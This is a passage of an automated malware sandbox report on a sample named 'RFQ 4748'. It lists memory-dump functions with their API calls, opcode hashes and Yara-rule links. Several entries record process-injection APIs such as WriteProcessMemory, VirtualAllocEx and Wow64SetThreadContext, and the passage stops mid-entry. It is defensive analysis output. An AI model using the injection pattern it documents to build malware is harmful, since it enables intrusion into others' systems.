                                                              Function 06ADB0A0 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06ADB1E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: 150bb991202324bd263aaa9dddd808f3009dcb760e4ba65a5a5b1bfbb92035e2
                                                              • Instruction ID: d93aa5a8d0e86852416a8f6a666faa84c4176185c0aadf945cf4642e251c9204
                                                              • Opcode Fuzzy Hash: 150bb991202324bd263aaa9dddd808f3009dcb760e4ba65a5a5b1bfbb92035e2
                                                              • Instruction Fuzzy Hash: BA518CB1D002598FDB50EFA9C8817EEBBF2FF48314F158129E816EB280D7749841CBA1
                                                              Function 06AD9A08 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06AD9AA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: f8a4dfb5abe7f2a6100467801b572df06ed6645aca28b1210044b4d65af4e1ff
                                                              • Instruction ID: 679948fb06d589191b31e5faed076c19deaf766cfa4e659d40a4f619bed7d4f6
                                                              • Opcode Fuzzy Hash: f8a4dfb5abe7f2a6100467801b572df06ed6645aca28b1210044b4d65af4e1ff
                                                              • Instruction Fuzzy Hash: 812135B2D003499FCB10DFAAC885BEEBBF5FF48314F108429E959A7251D7789944CBA1
                                                              Function 06AD9A10 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06AD9AA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 4a5c6573065cc2e1b7d79e27194161c6af66ce519f8d15ce11838924760d4287
                                                              • Instruction ID: 4b497cd2979c6fa345992a27f52ee0fafec0074608cd994d0d73819da0a44fb1
                                                              • Opcode Fuzzy Hash: 4a5c6573065cc2e1b7d79e27194161c6af66ce519f8d15ce11838924760d4287
                                                              • Instruction Fuzzy Hash: 5E2127B2D003499FCB10DFAAC885BEEBBF5FF48310F108429E919A7250D7789955CBA0
                                                              Function 06AD94E8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AD956E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: ab136d10d7a715803da48f3b7e33050e7fd4c039e0c12553463c24be855b4290
                                                              • Instruction ID: afd21a548a3dd405f82a40ce20ec9260d03f6734a9e8fa65e6efb7a30b80d526
                                                              • Opcode Fuzzy Hash: ab136d10d7a715803da48f3b7e33050e7fd4c039e0c12553463c24be855b4290
                                                              • Instruction Fuzzy Hash: 522125B5D003098FDB10DFAAC4857EEBBF5AF89324F14842AD459A7240DB78A945CBA1
                                                              Function 06AD990A Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AD997E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1bf21dfa39b458c0036b553125c0ed471c7d42003a1e70ed3976112cecc637fa
                                                              • Instruction ID: bb72cf94b983c0f1bdf6b02a84f535acc20187249b01c9d4058d277061e81916
                                                              • Opcode Fuzzy Hash: 1bf21dfa39b458c0036b553125c0ed471c7d42003a1e70ed3976112cecc637fa
                                                              • Instruction Fuzzy Hash: 46215E759002489FCB14EFAAD844AEFBFF9EF89314F148419E51967260CB39A540CFA1
                                                              Function 06AD9DFA Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06AD9E74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 293c23c0d79180aec97e78fb96f1af69b8b9823384a3a2e270610b266a9eb07e
                                                              • Instruction ID: 506dd837a9f4c3c7e23592fbbae58ddc1e424be2323c7dc0a2dfc263abec4dc8
                                                              • Opcode Fuzzy Hash: 293c23c0d79180aec97e78fb96f1af69b8b9823384a3a2e270610b266a9eb07e
                                                              • Instruction Fuzzy Hash: BA2137B18002099FDB10DFAAC840AEFFBF5FF89324F148429E419A7250CB389545CFA1
                                                              Function 06AD94F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AD956E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: ade75b62c0c615d1b68c8dd059ee3b35e88633a0486ef16fc7869d99da6e2f08
                                                              • Instruction ID: 86064174c76829c655fef293a2b56dc7415d7995a61c438a310975458703be54
                                                              • Opcode Fuzzy Hash: ade75b62c0c615d1b68c8dd059ee3b35e88633a0486ef16fc7869d99da6e2f08
                                                              • Instruction Fuzzy Hash: C72127B1D003098FDB50DFAAC4857EEBBF5EF89324F14842AD519A7240DB78A945CFA1
                                                              Function 06AD9E00 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06AD9E74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 754ee4cc227e92ad8669f1cc492c565881ce15ff8cbd007fec2c89a4edafd510
                                                              • Instruction ID: 13ab84b1ebdb90d129478383c9a63b738be0866cfc30a385f1260595f626b6db
                                                              • Opcode Fuzzy Hash: 754ee4cc227e92ad8669f1cc492c565881ce15ff8cbd007fec2c89a4edafd510
                                                              • Instruction Fuzzy Hash: 2F2115B1C002098FDB10DFAAC444AEEFBF5FF89320F108429D419A7250DB78A945CFA1
                                                              Function 06AD9910 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AD997E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 967dc91b97ed584669cd85a2ab40829d2bab3b45ff9b369f33f3b24c6753125b
                                                              • Instruction ID: 1742c3557a385fce133e721662f78d2331f7e1313f7111e5e2f4a6c96cedc63b
                                                              • Opcode Fuzzy Hash: 967dc91b97ed584669cd85a2ab40829d2bab3b45ff9b369f33f3b24c6753125b
                                                              • Instruction Fuzzy Hash: 711107759002499FCB10DFAAC845AEFFFF5EF88324F148419E519A7250C779A544CFA1
                                                              Function 06AA1009 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: 472fe7bf65d6c3547ffafaf325a0eae81df9f296f60ba503ca7077bfeaa7a41c
                                                              • Instruction ID: 93000e2552eb573f4a35ae188fa28a56228b492656352f8b060ba5973100358d
                                                              • Opcode Fuzzy Hash: 472fe7bf65d6c3547ffafaf325a0eae81df9f296f60ba503ca7077bfeaa7a41c
                                                              • Instruction Fuzzy Hash: DFA1EC34A10218DFCB84EFA4D99899DBBB2FF89305F158159E845AB365DB70EC42CF90
                                                              Function 06AE3010 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq
                                                              • API String ID: 0-1760495472
                                                              • Opcode ID: d4b439205f56a81c197beec9dcccc2f744ce81facd9d3ab96e4ef56c3e656bf8
                                                              • Instruction ID: afa00854f4cccc6de730cea31c59de6f8c3908fd1d6e3057517050714549e121
                                                              • Opcode Fuzzy Hash: d4b439205f56a81c197beec9dcccc2f744ce81facd9d3ab96e4ef56c3e656bf8
                                                              • Instruction Fuzzy Hash: 8971E8B8E00218DFDB44EFA9D4886EEBBB6FB89300F108129E556AB358DB345D45CF51
                                                              Function 06AE3008 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq
                                                              • API String ID: 0-1760495472
                                                              • Opcode ID: 472df82c7514b4691d1fb4706dc36ffec3791fe08d9c0bcf0a5e00c49abdf36d
                                                              • Instruction ID: 306a35558d881a2573b5385cccefdfbd7b9ded6581689e89469ab081d2d93ef9
                                                              • Opcode Fuzzy Hash: 472df82c7514b4691d1fb4706dc36ffec3791fe08d9c0bcf0a5e00c49abdf36d
                                                              • Instruction Fuzzy Hash: 9E71E9B8E00218DFDB44EFA9D4886EEBBB6FB89300F108129E556AB358DB345D45CF51
                                                              Function 06C5B1A8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq
                                                              • API String ID: 0-600464949
                                                              • Opcode ID: 92f75c7abf6f2e73df2099e0d1c94b3bbd0dae3eec05263259f64aac1dbb32ab
                                                              • Instruction ID: d2e9420a59dbe7db5d6f1c565b65b6cc5b3f8c0d81ea25047ceb5737d06625c8
                                                              • Opcode Fuzzy Hash: 92f75c7abf6f2e73df2099e0d1c94b3bbd0dae3eec05263259f64aac1dbb32ab
                                                              • Instruction Fuzzy Hash: 7151E531A006168FCB41DF58C89466EFFB1FF86310F16855AE955AB351C730ED92CB94
                                                              Function 06AAA768 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: fbq
                                                              • API String ID: 0-3185938239
                                                              • Opcode ID: b1151c65369ce344d4f61437b45980c3d14d75451118ceec651fee2dbd838572
                                                              • Instruction ID: 663bb564a9f478108ac3eb7482551113bde7a6c91e4b904d7a015004c10d0721
                                                              • Opcode Fuzzy Hash: b1151c65369ce344d4f61437b45980c3d14d75451118ceec651fee2dbd838572
                                                              • Instruction Fuzzy Hash: F2419432B047155FD754AB69E844AABB7EAFFC4624B14442FE649CB740DB71E802C790
                                                              Function 06C5A1E8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: paq
                                                              • API String ID: 0-3273118895
                                                              • Opcode ID: 29145429b8039f407266dba9797df44fdedb27a1aa314027f8aa10e74758fa37
                                                              • Instruction ID: 4f293d6e2c12e0769cc8571198c0f019b2466f3c66fe6f84803c7d070280e9a0
                                                              • Opcode Fuzzy Hash: 29145429b8039f407266dba9797df44fdedb27a1aa314027f8aa10e74758fa37
                                                              • Instruction Fuzzy Hash: EA515C76600104AFCB499FA9CD44D69BBF7FF8C3147168198E2099F276DA32DC21EB51
                                                              Function 06AA5D18 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq
                                                              • API String ID: 0-600464949
                                                              • Opcode ID: 5888dc359f84c3c836e4790d8cd7b27da78758a16a96282fd69663e87705b301
                                                              • Instruction ID: 367614566680f79b33df48bfb08f21ed64bb931d7165e20d5788ebb9fdbde134
                                                              • Opcode Fuzzy Hash: 5888dc359f84c3c836e4790d8cd7b27da78758a16a96282fd69663e87705b301
                                                              • Instruction Fuzzy Hash: 54416F76704204AFDB469F69D818E5A7FB6FF89310B1680AAE605CF272CB32D811DB51
                                                              Function 06AA4CBA Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: 125345e835f47121b861966fbe5d3f76a5b40d7a428037faa22922f9bb729d82
                                                              • Instruction ID: 6185826b56319e1ebbf62c6dcaae0e6c27c91fc79e8ed7ce2aeabf55c1d6ee91
                                                              • Opcode Fuzzy Hash: 125345e835f47121b861966fbe5d3f76a5b40d7a428037faa22922f9bb729d82
                                                              • Instruction Fuzzy Hash: 6D415E30B103149FCB94BB64D994AAEB7BBEFC9600F11442AE412AB394DF749C468B95
                                                              Function 012D0D9F Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 9181ddb96fa08b12582ac9e7a9090f912e97f2a2811aba86e26d960039be7b0f
                                                              • Instruction ID: fc5001840f9c6cd368d0450d154d864ce64f7a1ad47a52f031f7f09dffcd4af9
                                                              • Opcode Fuzzy Hash: 9181ddb96fa08b12582ac9e7a9090f912e97f2a2811aba86e26d960039be7b0f
                                                              • Instruction Fuzzy Hash: 4D41AD30B102059FDB04AFA9E598AADBBF6EFC8310F244429E406EB3A0DF755C068B55
                                                              Function 012D64CD Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: rq
                                                              • API String ID: 0-1470361113
                                                              • Opcode ID: 27047da7217c33fa7d94ac74c6d61c7d7c7f2422b5603acfb7085ef76a8a5086
                                                              • Instruction ID: 31296b39860a7e1c0f1d901071e3dc1c8f2dd1bd003267f09d5f08f40370cba7
                                                              • Opcode Fuzzy Hash: 27047da7217c33fa7d94ac74c6d61c7d7c7f2422b5603acfb7085ef76a8a5086
                                                              • Instruction Fuzzy Hash: EA4169B0D0424C9FDB14DFA9C494AEEBFF5EF48300F248469E509AB254DB389945CB90
                                                              Function 012D0E28 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: b9d76c82d84029f96e1d53129e6815b66f2b374a24959a662f5009c74c42cb66
                                                              • Instruction ID: 20e140437fda53f1bcafcd2229807ead43bb4f82a62a810c54aa6ef2f91e8b72
                                                              • Opcode Fuzzy Hash: b9d76c82d84029f96e1d53129e6815b66f2b374a24959a662f5009c74c42cb66
                                                              • Instruction Fuzzy Hash: 12319C34B102058FCB04AFB8E59866DBAE3AFC8310F244429E406EB3A4DF759C418B55
                                                              Function 06AA0488 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: 8294cf16c752ae9ab7b17bc1c9b48208ec539fd7011825a80966cb0647c72ecb
                                                              • Instruction ID: d287c2af15d068cb2923b9ac22cbaa91af8a1a03f8262452adb19776821344f8
                                                              • Opcode Fuzzy Hash: 8294cf16c752ae9ab7b17bc1c9b48208ec539fd7011825a80966cb0647c72ecb
                                                              • Instruction Fuzzy Hash: 6B31C5317002059FDF15AF54D954E9A7BBBEF88350B054169EA069B371DB31DC12CB90
                                                              Function 05858942 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &
                                                              • API String ID: 0-1010288
                                                              • Opcode ID: a7a59660e7528cefa5f0c60ec4e5607fe4091593deb99725860a0e9e8ca71303
                                                              • Instruction ID: 71b0c3a252412a54995eabb6022e14c1ed5c678f123996f86ddbe4115fb04bca
                                                              • Opcode Fuzzy Hash: a7a59660e7528cefa5f0c60ec4e5607fe4091593deb99725860a0e9e8ca71303
                                                              • Instruction Fuzzy Hash: 0341BF74905268DFDBA0DF64D988BE9BBB2FB09354F1085EAE809B7240D7359E85CF00
                                                              Function 06C5EDAC Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: p<]q
                                                              • API String ID: 0-1327301063
                                                              • Opcode ID: 721058ebc35a7a55dd743c1507f8ac813b91b8b6e5513cdb0f0f41283a65e58d
                                                              • Instruction ID: b651229ef6e787075d18292a1baea476856fb17c5c4f899c0e27a7170bb84362
                                                              • Opcode Fuzzy Hash: 721058ebc35a7a55dd743c1507f8ac813b91b8b6e5513cdb0f0f41283a65e58d
                                                              • Instruction Fuzzy Hash: 143180716042989FCB41DF29CC849AA3BE9AF8E340B16409AFC54CB262C635DD91CB60
                                                              Function 06A51E2C Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2104924846.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6a50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: 2cf17cb43212da03302fb6c2e8dfcdc9126aad9f787f6423216a87e4eac17d43
                                                              • Instruction ID: 2f8b570e16201ac39bc4a2cd3130132a0d0503201c288f48624ce14b5b39c9cb
                                                              • Opcode Fuzzy Hash: 2cf17cb43212da03302fb6c2e8dfcdc9126aad9f787f6423216a87e4eac17d43
                                                              • Instruction Fuzzy Hash: 21319C30D0524ACFDB55EFA5C5587FEBBB1EF86311F0180AAD811AB691C7381A45CF91
                                                              Function 05858FC0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *
                                                              • API String ID: 0-163128923
                                                              • Opcode ID: 1f23a165801d30974559aea1d47057956a308fcc706f71f9a225eb88df9e8889
                                                              • Instruction ID: 457acb274a75225dd7a2ce432c63e5739460ce0ec7aae8516fdac57585d7abf5
                                                              • Opcode Fuzzy Hash: 1f23a165801d30974559aea1d47057956a308fcc706f71f9a225eb88df9e8889
                                                              • Instruction Fuzzy Hash: 5D31B074905268CFDBA4CF64D888BE8BBB1FB05354F5095EAD809B7280CB359E85CF15
                                                              Function 05850CDE Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: 7484ef157e5f23e54d6dbab6e53702d29108821e99212a6998774696307cebd9
                                                              • Instruction ID: 797ef9bb1e40b56e108cdc5901b532e64a52086eb0b83aa6e58cc1756e1ede18
                                                              • Opcode Fuzzy Hash: 7484ef157e5f23e54d6dbab6e53702d29108821e99212a6998774696307cebd9
                                                              • Instruction Fuzzy Hash: 22310C78905228CFDB65EF24D898BA9B7B2FB45305F1081E5D84AA7394CB355EC4CF40
                                                              Function 058582A8 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *
                                                              • API String ID: 0-163128923
                                                              • Opcode ID: fb41c40a6e6c535968ffa17b9ffcd1609d7d292d9901c4ab8f2da5a1855a124e
                                                              • Instruction ID: e5e00e6091fb0c4580963c4bdd226a651d7438c113b00f7eb864cb98588a0fd5
                                                              • Opcode Fuzzy Hash: fb41c40a6e6c535968ffa17b9ffcd1609d7d292d9901c4ab8f2da5a1855a124e
                                                              • Instruction Fuzzy Hash: D8319F74905268CFDBA4DF68D898BD8BBB1FB09344F5095EAD809B7280CB359E85CF14
                                                              Function 06C54A0A Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: G
                                                              • API String ID: 0-985283518
                                                              • Opcode ID: e343835dfe4205e460f8a9f244da077c82052a8290b8c38f3d8a16e8b6d07b42
                                                              • Instruction ID: e709afcefe0649afdb897c581a11dcd574978d5b65556288cb5dfc37bced8a76
                                                              • Opcode Fuzzy Hash: e343835dfe4205e460f8a9f244da077c82052a8290b8c38f3d8a16e8b6d07b42
                                                              • Instruction Fuzzy Hash: 6A1175B4A011188FCBA4DF25DD94ADABBB1BF49305F0091EAD44EA7260DB316E80CF41
                                                              Function 06F62516 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105998096.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f60000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: <
                                                              • API String ID: 0-4251816714
                                                              • Opcode ID: 513a1c2c0be860b98a75803967f3fdcf3a228482308e39cf873f9f2edd52f499
                                                              • Instruction ID: ba16444027486387c49d35d06b427a77ec686a826e448e57acc7e12fa01ff4a0
                                                              • Opcode Fuzzy Hash: 513a1c2c0be860b98a75803967f3fdcf3a228482308e39cf873f9f2edd52f499
                                                              • Instruction Fuzzy Hash: E501FFB8A04228DFDBA4DF14C9D8BA9B7F5FB8A305F1040D5A44AA7344CB745D85CF11
                                                              Function 06AE92EC Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
